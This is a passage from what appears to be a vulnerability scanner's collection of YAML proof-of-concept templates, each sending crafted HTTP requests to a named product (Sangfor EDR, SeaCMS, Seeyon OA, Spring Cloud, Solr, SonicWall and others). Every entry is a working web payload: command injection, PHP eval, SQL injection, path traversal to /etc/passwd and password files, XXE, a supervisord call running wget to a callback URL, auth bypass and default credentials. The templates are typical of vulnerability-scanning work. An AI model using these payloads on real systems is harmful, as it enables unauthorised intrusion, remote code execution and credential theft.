9 | 10 | detail: 11 | author: Print1n(http://print1n.top) 12 | links: 13 | - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-edr-arbitrary-admin-login.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-arbitrary-admin-login 2 | rules: 3 | - method: GET 4 | path: /ui/login.php?user=admin 5 | follow_redirects: false 6 | expression: > 7 | response.status == 302 && 8 | response.body.bcontains(b"/download/edr_installer_") && 9 | response.headers["Set-Cookie"] != "" 10 | detail: 11 | author: hilson 12 | links: 13 | - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-edr-cssp-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-cssp-rce 2 | rules: 3 | - method: POST 4 | path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: >- 8 | {"params":"w=123\"'1234123'\"|id"} 9 | expression: > 10 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)") 11 | detail: 12 | author: x1n9Qi8 13 | Affected Version: "Sangfor EDR 3.2.17R1/3.2.21" 14 | links: 15 | - https://www.cnblogs.com/0day-li/p/13650452.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-edr-tool-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-tool-rce 2 | set: 3 | r1: randomLowercase(8) 4 | r2: randomLowercase(8) 5 | rules: 6 | - method: GET 7 | path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}" 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) 11 | detail: 12 | author: cookie 13 | links: 14 | - https://edr.sangfor.com.cn/ 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/satellian-cve-2020-7980-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-satellian-cve-2020-7980-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: >- 8 | /cgi-bin/libagent.cgi?type=J 9 | headers: 10 | Cookie: ctr_t=0; sid=123456789 11 | Content-Type: application/json 12 | body: >- 13 | {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr {{r1}} + {{r2}}", "F": "EXEC_CMD"}, "V_": 1} 14 | follow_redirects: true 15 | expression: response.body.bcontains(bytes(string(r1 + r2))) 16 | detail: 17 | author: JingLing(https://hackfun.org/) 18 | Affected version: Intellian Aptus Web <= 1.24 19 | links: 20 | - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/seacms-before-v992-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-before-v992-rce 2 | set: 3 | r1: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: "/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E" 7 | expression: | 8 | response.status == 200 9 | - method: GET 10 | path: "/data/mysqli_error_trace.php?_=printf(md5(\"{{r1}}\"))%3B" 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(md5(r1))) 13 | detail: 14 | author: bufsnake(https://github.com/bufsnake) 15 | links: 16 | - https://www.zhihuifly.com/t/topic/3118 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/seacms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/search.php?print({{r}}%2b{{r1}})" 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: | 11 | searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/* 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 14 | detail: 15 | author: neverendxxxxxx(https://github.com/neverendxxxxxx),violin 16 | seacms: v6.55 17 | links: 18 | - https://www.jianshu.com/p/8d878330a42f 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/seacms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-sqli 2 | rules: 3 | - method: GET 4 | path: /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec99") 8 | detail: 9 | author: MaxSecurity(https://github.com/MaxSecurity) 10 | links: 11 | - https://www.uedbox.com/post/54561/ 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/seacms-v654-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-v654-rce 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /search.php 7 | body: >- 8 | searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=prin&9[]=tf(md5({{rand}})); 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 12 | detail: 13 | links: 14 | - http://0day5.com/archives/4249/ 15 | - https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/ -------------------------------------------------------------------------------- /src/plugins/pocs/seacmsv645-command-exec.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacmsv645-command-exec 2 | set: 3 | rand1: randomInt(200000000, 210000000) 4 | rand2: randomInt(200000000, 210000000) 5 | rules: 6 | - method: POST 7 | path: /search.php?searchtype=5 8 | body: searchtype=5&order=}{end if} {if:1)print({{rand1}}%2b{{rand2}});if(1}{end if} 9 | expression: | 10 | response.body.bcontains(bytes(string(rand1 + rand2))) 11 | detail: 12 | author: Facker007(https://github.com/Facker007) 13 | links: 14 | - https://www.cnblogs.com/ffx1/p/12653597.html 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/secnet-ac-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-secnet-ac-default-password 2 | rules: 3 | - method: GET 4 | path: /login.html 5 | expression: response.status == 200 && response.body.bcontains(b"安网科技-智能路由系统") 6 | 7 | - method: POST 8 | path: /login.cgi 9 | body: 10 | user=admin&password=admin 11 | expression: response.status == 200 && response.headers["Set-Cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_") 12 | detail: 13 | author: iak3ec(https://github.com/nu0l) 14 | links: 15 | - https://bbs.secnet.cn/post/t-30 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-a6-employee-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-a6-employee-info-leak 2 | groups: 3 | poc1: 4 | - method: GET 5 | path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 6 | expression: 7 | response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet") 8 | detail: 9 | author: sakura404x 10 | version: 致远A6 11 | links: 12 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-a6-test-jsp-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-a6-test-jsp-sql 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) 7 | expression: 8 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: sakura404x 11 | version: 致远A6 12 | links: 13 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-ajax-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-ajax-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: /seeyon/thirdpartyController.do.css/..;/ajax.do 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) 7 | - method: GET 8 | path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json") 11 | 12 | detail: 13 | author: x1n9Qi8 14 | links: 15 | - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA 16 | - https://buaq.net/go-53721.html 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-cnvd-2020-62422-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-cnvd-2020-62422-readfile 2 | rules: 3 | - method: GET 4 | path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 5 | follow_redirects: false 6 | expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") 7 | detail: 8 | author: Aquilao(https://github.com/Aquilao) 9 | info: seeyon readfile(CNVD-2020-62422) 10 | links: 11 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-oa-a8-m-information-disclosure.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-oa-a8-m-information-disclosure 2 | manual: true 3 | transport: http 4 | rules: 5 | - method: GET 6 | path: /seeyon/management/index.jsp 7 | expression: response.status == 200 8 | - method: POST 9 | path: /seeyon/management/index.jsp 10 | headers: 11 | Content-Type: application/x-www-form-urlencoded 12 | body: password=WLCCYBD%40SEEYON 13 | follow_redirects: true 14 | expression: response.status == 200 && response.body.bcontains(bytes("Free Physical Memory Size")) 15 | detail: 16 | author: Monday 17 | links: 18 | - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-oa-cookie-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-oa-cookie-leak 2 | rules: 3 | - method: POST 4 | path: /seeyon/thirdpartyController.do 5 | body: | 6 | method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1 7 | expression: | 8 | response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"/seeyon/common/") 9 | - method: GET 10 | path: /seeyon/main.do?method=headerjs 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"\"name\":\"系统管理员\"") && response.body.bcontains(b"\"id\":\"-7273032013234748168\"") 13 | detail: 14 | author: Print1n(http://print1n.top) 15 | links: 16 | - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-session-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-session-leak 2 | rules: 3 | - method: GET 4 | path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll 5 | expression: 6 | response.status == 200 && response.body.bcontains(b"\r\n\r\n") 7 | detail: 8 | author: sakura404x 9 | links: 10 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-setextno-jsp-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-setextno-jsp-sql 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5({{rand}})%23 7 | expression: 8 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: sakura404x 11 | version: 致远A6 12 | links: 13 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3348.md -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-unauthoried.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-unauthoried 2 | rules: 3 | - method: POST 4 | path: "/seeyon/thirdpartyController.do" 5 | expression: "true" 6 | body: | 7 | method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4 8 | search: >- 9 | JSESSIONID=(?P.+?) 10 | - method: GET 11 | path: "/seeyon/main.do" 12 | headers: 13 | Cookie: JSESSIONID={{session}} 14 | expression: | 15 | response.status == 200 && response.body.bcontains(b"当前已登录了一个用户,同一窗口中不能登录多个用户") 16 | detail: 17 | author: whami-root(https://github.com/whami-root) 18 | links: 19 | - https://github.com/whami-root -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-wooyun-2015-0108235-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-0108235-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5({{rand}}),7-- 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | links: 12 | - https://bugs.shuimugan.com/bug/view?bug_no=0108235 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-wooyun-2015-148227.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-148227 2 | rules: 3 | - method: GET 4 | path: /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(bytes("NCInvokerServlet")) 8 | detail: 9 | author: canc3s(https://github.com/canc3s) 10 | links: 11 | - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/shiziyu-cms-apicontroller-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-shiziyu-cms-apicontroller-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1) 7 | expression: 8 | response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) 9 | detail: 10 | author: sakura404x 11 | links: 12 | - https://blog.csdn.net/weixin_42633229/article/details/117070546 -------------------------------------------------------------------------------- /src/plugins/pocs/shopxo-cnvd-2021-15822.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-shopxo-cnvd-2021-15822 2 | groups: 3 | Linux: 4 | - method: GET 5 | path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | Windows: 10 | - method: GET 11 | path: /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && response.body.bcontains(b"extensions") && response.body.bcontains(b"for 16-bit app support") 15 | detail: 16 | author: Print1n(http://print1n.top) 17 | description: ShopXO download 任意文件读取 18 | links: 19 | - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/showdoc-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-showdoc-default-password 2 | rules: 3 | - method: POST 4 | path: /server/index.php?s=/api/user/login 5 | body: username=showdoc&password=123456 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"groupid") && response.body.bcontains(b"user_token") 9 | detail: 10 | author: B1anda0(https://github.com/B1anda0) 11 | links: 12 | - https://blog.star7th.com/2016/05/2007.html -------------------------------------------------------------------------------- /src/plugins/pocs/skywalking-cve-2020-9483-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-skywalking-cve-2020-9483-sqli 2 | set: 3 | r1: randomInt(10000, 99999) 4 | rules: 5 | - method: POST 6 | path: "/graphql" 7 | headers: 8 | Content-Type: application/json 9 | body: | 10 | {"query":"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\"all_p99\",id:\"') UNION SELECT 1,CONCAT('~','{{r1}}','~')-- \",}, duration: $d){values{value}}}","variables":{"d":{"start":"2021-11-11","end":"2021-11-12","step":"DAY"}}} 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes("~" + string(r1) + "~")) 13 | detail: 14 | author: sndav(https://github.com/Sndav) 15 | links: 16 | - https://paper.seebug.org/1485/ -------------------------------------------------------------------------------- /src/plugins/pocs/solarwinds-cve-2020-10148.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solarwinds-cve-2020-10148 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /web.config.i18n.ashx?l=en-US&v={{r1}} 7 | expression: | 8 | response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl")) 9 | detail: 10 | author: su(https://suzzz112113.github.io/#blog) 11 | CVE: CVE-2020-10148 12 | links: 13 | - https://kb.cert.org/vuls/id/843464 -------------------------------------------------------------------------------- /src/plugins/pocs/solr-cve-2017-12629-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solr-cve-2017-12629-xxe 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: GET 7 | path: "/solr/admin/cores?wt=json" 8 | expression: "true" 9 | search: | 10 | "name":"(?P[^"]+)", 11 | - method: GET 12 | path: /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{{reverseURL}}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser 13 | follow_redirects: true 14 | expression: | 15 | reverse.wait(5) 16 | detail: 17 | author: sharecast 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/sonarqube-cve-2020-27986-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonarqube-cve-2020-27986-unauth 2 | rules: 3 | - method: GET 4 | path: "/api/settings/values" 5 | expression: | 6 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(bytes(string(b"sonaranalyzer-cs.nuget.packageVersion"))) && response.body.bcontains(bytes(string(b"sonar.core.id"))) 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "sonarqube < 8.4.2.36762" 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2020-27986 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/sonicwall-ssl-vpn-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonicwall-ssl-vpn-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(1140000, 1144800) 5 | rules: 6 | - method: GET 7 | path: /cgi-bin/jarrewrite.sh 8 | follow_redirects: false 9 | headers: 10 | X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/spark-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-api-unauth 2 | rules: 3 | - method: GET 4 | path: /v1/submissions 5 | expression: | 6 | response.status == 400 && response.body.bcontains(b"Missing an action") && response.body.bcontains(b"serverSparkVersion") 7 | detail: 8 | author: betta(https://github.com/betta-cyber) 9 | links: 10 | - https://xz.aliyun.com/t/2490 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/spark-webui-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-webui-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | expression: response.status == 200 && response.body.bcontains(b"Spark") && response.body.bcontains(b"<strong>URL:</strong> spark:") 6 | detail: 7 | links: 8 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc -------------------------------------------------------------------------------- /src/plugins/pocs/spon-ip-intercom-ping-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spon-ip-intercom-ping-rce 2 | set: 3 | r1: randomLowercase(10) 4 | r2: randomLowercase(10) 5 | r3: randomLowercase(10) 6 | r4: randomLowercase(10) 7 | rules: 8 | - method: POST 9 | path: /php/ping.php 10 | headers: 11 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 12 | body: | 13 | jsondata[ip]=%7C echo {{r1}}${{{r2}}}{{r3}}^{{r4}}&jsondata[type]=0 14 | expression: response.status == 200 && (response.body.bcontains(bytes(r1 + r3 + "^" + r4)) || response.body.bcontains(bytes(r1 + "${" + r2 + "}" + r3 + r4))) 15 | 16 | detail: 17 | author: york 18 | links: 19 | - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/spring-actuator-heapdump-file.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-actuator-heapdump-file 2 | rules: 3 | - method: HEAD 4 | path: /actuator/heapdump 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.content_type.contains("application/octet-stream") 8 | detail: 9 | author: AgeloVito 10 | info: spring-actuator-heapdump-file 11 | links: 12 | - https://www.cnblogs.com/wyb628/p/8567610.html 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/spring-cloud-cve-2020-5405.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5405 2 | rules: 3 | - method: GET 4 | path: >- 5 | /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit.")) 9 | 10 | detail: 11 | version: <= 2.1.6, 2.2.1 12 | author: kingkk(https://www.kingkk.com/) 13 | links: 14 | - https://pivotal.io/security/cve-2020-5405 15 | - https://github.com/spring-cloud/spring-cloud-config -------------------------------------------------------------------------------- /src/plugins/pocs/spring-cloud-cve-2020-5410.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5410 2 | rules: 3 | - method: GET 4 | path: >- 5 | /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: Soveless(https://github.com/Soveless) 10 | Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9" 11 | links: 12 | - https://xz.aliyun.com/t/7877 -------------------------------------------------------------------------------- /src/plugins/pocs/spring-cve-2016-4977.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cve-2016-4977 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test 8 | follow_redirects: false 9 | expression: > 10 | response.body.bcontains(bytes(string(r1 * r2))) 11 | detail: 12 | Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)" 13 | author: hanxiansheng26(https://github.com/hanxiansheng26) 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/springboot-env-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springboot-env-unauth 2 | groups: 3 | spring1: 4 | - method: GET 5 | path: /env 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") 8 | spring2: 9 | - method: GET 10 | path: /actuator/env 11 | expression: | 12 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") 13 | detail: 14 | links: 15 | - https://github.com/LandGrey/SpringBootVulExploit 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/springcloud-cve-2019-3799.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springcloud-cve-2019-3799 2 | rules: 3 | - method: GET 4 | path: >- 5 | /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | 10 | detail: 11 | version: <2.1.2, 2.0.4, 1.4.6 12 | author: Loneyer 13 | links: 14 | - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/sql-file.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sql-file 2 | set: 3 | host: request.url.domain 4 | sets: 5 | path: 6 | - "1.sql" 7 | - "backup.sql" 8 | - "database.sql" 9 | - "data.sql" 10 | - "db_backup.sql" 11 | - "dbdump.sql" 12 | - "db.sql" 13 | - "dump.sql" 14 | - "{{host}}.sql" 15 | - "{{host}}_db.sql" 16 | - "localhost.sql" 17 | - "mysqldump.sql" 18 | - "mysql.sql" 19 | - "site.sql" 20 | - "sql.sql" 21 | - "temp.sql" 22 | - "translate.sql" 23 | - "users.sql" 24 | rules: 25 | - method: GET 26 | path: /{{path}} 27 | follow_redirects: false 28 | continue: true 29 | expression: | 30 | "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO".bmatches(response.body) 31 | detail: 32 | author: shadown1ng(https://github.com/shadown1ng) 33 | -------------------------------------------------------------------------------- /src/plugins/pocs/supervisord-cve-2017-11610.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-supervisord-cve-2017-11610 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: /RPC2 8 | body: >- 9 | <?xml version="1.0"?> 10 | <methodCall> 11 | <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName> 12 | <params> 13 | <param> 14 | <string>wget {{reverseURL}}</string> 15 | </param> 16 | </params> 17 | </methodCall> 18 | follow_redirects: false 19 | expression: | 20 | response.status == 200 && reverse.wait(5) 21 | detail: 22 | author: Loneyer 23 | links: 24 | - https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610 25 | -------------------------------------------------------------------------------- /src/plugins/pocs/tamronos-iptv-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tamronos-iptv-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: /api/ping?count=5&host=;echo%20$(expr%20{{r1}}%20%2b%20{{r2}}):{{r1}}:{{r1}};&port=80&source=1.1.1.1&type=icmp 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 11 | detail: 12 | author: Print1n 13 | description: TamronOS IPTV系统存在前台命令执行漏洞 14 | links: 15 | - https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%8D%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/tensorboard-unauth.yml: -------------------------------------------------------------------------------- 1 